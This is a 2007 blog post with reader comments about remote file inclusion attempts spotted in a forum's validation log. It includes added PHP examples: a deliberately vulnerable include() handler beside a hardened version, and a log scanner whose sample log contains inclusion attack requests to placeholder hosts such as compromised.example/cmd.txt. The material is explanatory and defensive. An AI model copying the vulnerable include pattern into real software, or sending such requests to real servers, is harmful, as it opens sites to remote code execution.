So many servers, all hacked.

11am, 13th October 2007 - Geek, Interesting, Web, Security, Developer

Yesterday, while trying to track down a problem with one of our forums, I was looking through the validation log and spotted something rather unusual.

The validation log stores all the parameters passed to the forums that failed validation so that we can verify that no legitimate users are being denied access. Parameters include things like which post you are looking at, which thread it's in, which board the thread's in and which page of the thread you are on. Normally, the post number, thread number and page number are all actually numbers but occasionally, somebody thinks it might be a good idea to put something else, like a URL, into the post number parameter.

In this case, it was a misguided hacking attempt aimed at a completely different piece of software than the one we are running. We didn't have the vulnerability he was trying to exploit. Had it been aimed at the correct software and succeeded, the parameter would have made the script include a PHP file from someone else's webserver instead of one on our own, and run it just as it does when the file is local. The difference is that the code from the other webserver would have installed a rootkit, a command and control interface and a couple of new users, and finally sent a message back to its owner telling him where we were.
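The inclusion flaw described above, as an added example that is not code from this post or from any forum package: a PHP page handler that builds the argument of include() from a request parameter, beside an allow-listed version of the same handler. The parameter name "page", the templates directory and the list of page names are assumptions made for the example.

```php
<?php
// Added example, not the forum code from the post. Shows the remote file
// inclusion (RFI) pattern the post describes: a request parameter becomes the
// argument of include(), so with allow_url_include=On a request such as
//   index.php?page=http://compromised.example/cmd.txt?
// makes PHP fetch that file and execute it. The trailing "?" turns the
// appended ".php" into a query string, so the remote server ignores it.
// The parameter name "page", TEMPLATE_DIR and ALLOWED_PAGES are assumptions.

// --- Vulnerable form (kept only to show the flaw; do not deploy) ----------
function render_vulnerable(string $page): void
{
    // $page is $_GET['page'] unchanged. Anything include() accepts gets in:
    // a URL (remote inclusion), "../../etc/passwd" (local inclusion), and so on.
    include $page . '.php';
}

// --- Hardened form --------------------------------------------------------
const TEMPLATE_DIR  = __DIR__ . '/templates';
const ALLOWED_PAGES = ['index', 'board', 'thread', 'post'];

// Allow-list check: only a fixed set of page names is acceptable. A URL,
// a "../" sequence or a null byte is simply not in the list.
function is_allowed_page(string $page): bool
{
    return in_array($page, ALLOWED_PAGES, true);
}

// Map an allowed name to a real file and confirm it lives under TEMPLATE_DIR,
// so a future mistake in the allow-list still cannot escape that directory.
function resolve_template(string $page): ?string
{
    if (!is_allowed_page($page)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $real = realpath(TEMPLATE_DIR . '/' . $page . '.php');
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

function render_hardened(string $page): void
{
    $template = resolve_template($page);
    if ($template === null) {
        // Refuse and record the bad value (hex, so it cannot corrupt the log);
        // this is the kind of entry that ends up in a validation log.
        http_response_code(400);
        error_log('rejected page parameter: ' . bin2hex($page));
        return;
    }
    include $template;
}

// Self-check from the command line; needs no templates directory.
if (PHP_SAPI === 'cli') {
    $samples = [
        'thread',
        'http://compromised.example/cmd.txt?',
        '../../etc/passwd',
        "index\0",
    ];
    foreach ($samples as $p) {
        printf("%-45s %s\n", addcslashes($p, "\0..\37"),
               is_allowed_page($p) ? 'accepted' : 'rejected');
    }
}
```

Two php.ini settings sit behind this. On PHP 5.2 and later, allow_url_include (default Off) controls whether include() and require() may fetch URLs at all; on older releases allow_url_fopen was the only switch, and turning it off also broke legitimate remote fopen() calls. Either setting only closes the remote half of the problem: a parameter that reaches include() unchecked still lets an attacker pull in local files, which is why the allow-list in the code is the part that matters.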

Unfortunately, people who try to seize control of other people's webservers are a paranoid lot. They don't usually just start hacking from their home computer and head straight for the target. They will use Tor or an anonymous proxy to mask their true identities. They'll use webservers that they have already cracked to help crack new webservers. In this case, tracing the hacking attempt back to where it came from only led us to another compromised server with a web-based command and control page and the file required to hack other servers.

I didn't pursue it any further for several reasons: I'm not paid to hunt down crackers, it would have been illegal for me to use the compromised server to find out where it had been compromised from and it was an unsuccessful attempt to exploit a vulnerability we didn't even have. Out of interest, I did quickly grep through the entire set of validation logs just to see how many of these attempts there were and from how many already-compromised webservers. The result was astounding. I sat there for minutes, watching the URLs of compromised servers fly past on my screen.

I wasn't all that surprised to see lots of hacking attempts. Just put a machine on the internet running Snort for a day and you'll understand why. What did surprise me was the sheer number of already compromised servers sitting out there. Do people not have intrusion detection systems? Do they not check their log files? Has somebody like me not already noticed that their server has been hacked and emailed to let them know? (For the record, I did email the admin of the first server but once I found the hundreds or thousands in the log files I decided that it was a bit much effort for me...)

Does security not matter to these people?

I suspect that's the answer. Most people are on the net to create something. They aren't interested in learning all about computer security and how to secure their machines. They just want to create their own little corner of the web where they can do as they please.


Comments


On Mon 5th Nov 2007 at 5pm Filipe Freitas said:

I think you're referring to remote code injection attacks. I also have those on my server, but they don't work (I hope). I ban their IPs and sit back and enjoy watching their requests being splattered like flies.
On Mon 5th Nov 2007 at 10pm Dave said:

You're absolutely correct. It might have been more obvious if I had posted some examples but there are several reasons that I didn't.

If I had posted the URLs that the attackers are trying to include in my PHP scripts, I would be exposing the poor guy whose server has already been hacked. If I post an example script to my own site, attackers will try to use my site as part of their attack... or just learn by copying whatever I put up.

On the other hand, letting webmasters know what to look for may do much more to help security than avoiding giving hackers their tools. I'll post some actual examples here once the compromised servers have been cleaned up.
On Mon 12th Nov 2007 at 10am Bart said:

Small note: protect your form ;)

You can simply click on Submit without entering any data.
On Mon 12th Nov 2007 at 8pm Dave said:

Heh. True.

There are far too many TODO items in my code. Once I've finished the security side of things I sometimes forget about the "features".
On Thu 3rd Apr 2008 at 4pm toby said:

Dave,

Can you tell me how to check the log for those attempts? I really hope to learn how to check the log using my telnet tool.

toby
On Sat 10th May 2008 at 4pm Dave said:

If you have shell access on your webserver (whether that be by telnet, ssh or in person with a keyboard) you can find these sorts of entries in your log files with the following command:

    awk '$7 ~ /http/ {print $7}' /var/log/httpd/access_log

You will need to replace "/var/log/httpd/access_log" with the location of your log file.
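For the "check their log files" point in the post and the awk one-liner in Dave's reply above, here is an added example that is not code from the post or from any commenter: a PHP command-line script, for webmasters in this thread who have PHP but little else, that parses Apache combined-format access log lines, decodes each query parameter, flags any parameter value that is itself a URL, and counts the remote hosts those values point at (the already-compromised servers the post describes). The log lines embedded in it are constructed for the example and the hostnames in them are placeholders, not real servers.

```php
<?php
// Added example, not code from the post. Scans an Apache combined-format
// access log for inclusion attempts: any request whose query string carries
// a parameter value that is itself a URL. It reports the client IP, the
// parameter, the URL and the remote host the attacker wanted us to fetch from.
// SAMPLE_LOG is constructed for this example; the hostnames are placeholders.

const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [12/Oct/2007:03:14:07 +0100] "GET /forum/index.php?board=3&thread=42&page=2 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Oct/2007:03:15:51 +0100] "GET /forum/index.php?post=http://compromised.example/cmd.txt? HTTP/1.1" 403 312 "-" "libwww-perl/5.805"
198.51.100.23 - - [12/Oct/2007:03:15:52 +0100] "GET /forum/index.php?post=http://compromised.example/cmd.txt%3F HTTP/1.0" 403 312 "-" "libwww-perl/5.805"
192.0.2.99 - - [12/Oct/2007:03:20:00 +0100] "GET /forum/index.php?thread=ftp://other.example/id.txt HTTP/1.1" 403 312 "-" "Wget/1.10"
203.0.113.7 - - [12/Oct/2007:03:21:10 +0100] "POST /forum/reply.php HTTP/1.1" 302 0 "http://www.example.com/forum/" "Mozilla/5.0"
LOG;

// Combined log format: client IP, then the quoted request line, then status.
const LINE_RE = '/^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})/';

/**
 * One entry per suspicious request:
 * ['client' => ip, 'param' => name, 'url' => value, 'host' => host, 'status' => int].
 */
function find_inclusion_attempts(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match(LINE_RE, $line, $m)) {
            continue;                       // not a request line we understand
        }
        [, $client, , $target, $status] = $m;
        $query = parse_url($target, PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;                       // no query string at all
        }
        parse_str($query, $params);         // url-decodes values, so %3A%2F%2F is caught too
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue;                   // array-style parameters (a[]=...) are out of scope
            }
            // A legitimate post, thread, board or page number never carries a scheme.
            if (preg_match('#^(https?|ftp)://#i', $value)) {
                $hits[] = [
                    'client' => $client,
                    'param'  => (string) $name,
                    'url'    => $value,
                    'host'   => parse_url($value, PHP_URL_HOST),
                    'status' => (int) $status,
                ];
            }
        }
    }
    return $hits;
}

/** Attempts per remote host, most active first: the list of servers to warn. */
function hosts_by_attempts(array $hits): array
{
    $counts = [];
    foreach ($hits as $h) {
        $counts[$h['host']] = ($counts[$h['host']] ?? 0) + 1;
    }
    arsort($counts);
    return $counts;
}

if (PHP_SAPI === 'cli') {
    // Usage: php scan.php /var/log/httpd/access_log   (no argument: the sample)
    $log  = $argc > 1 ? file_get_contents($argv[1]) : SAMPLE_LOG;
    $hits = find_inclusion_attempts($log);
    foreach ($hits as $h) {
        printf("%-15s %s=%s (HTTP %d)\n", $h['client'], $h['param'], $h['url'], $h['status']);
    }
    echo "\nRemote hosts (likely already compromised):\n";
    foreach (hosts_by_attempts($hits) as $host => $n) {
        printf("%5d  %s\n", $n, $host);
    }
}
```

On the sample above the script reports three attempts and two remote hosts, compromised.example twice and other.example once. The difference from the awk one-liner is that it tests the decoded parameter value rather than the raw request field, and separates the remote host so that the servers being used as hosting for the attack can be listed and their admins contacted, which is the step the post says became too much effort by hand.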
On Thu 22nd May 2008 at 12pm Melanie said:

Hi Dave

I was going through my log files and found the same type of links you referred to in an earlier post - cmd.txt files - I'm a little confused though - you mentioned in your article about compromised servers, I don't fully understand how everything fits together and how I can check that my site is completely secure. If you get some time, would you be able to email me and explain. I'd really appreciate it very much.

Rgds
Melanie


On Sun 22nd Jun 2008 at 12pm Canober Blog said:

Some people just want to be a part of the web but they won't have any idea about security and server protection. In my blogs I use wordpress but on the main page it's always a CMS written by me because I check and recheck for any vulnerabilities and then upload the script.
On Mon 10th Nov 2008 at 1pm jefferysuky said:

for just hacking only
On Wed 28th Sep 2011 at 4pm Dave said:

That's an odd thing to say. Any chance you could elaborate a little ?

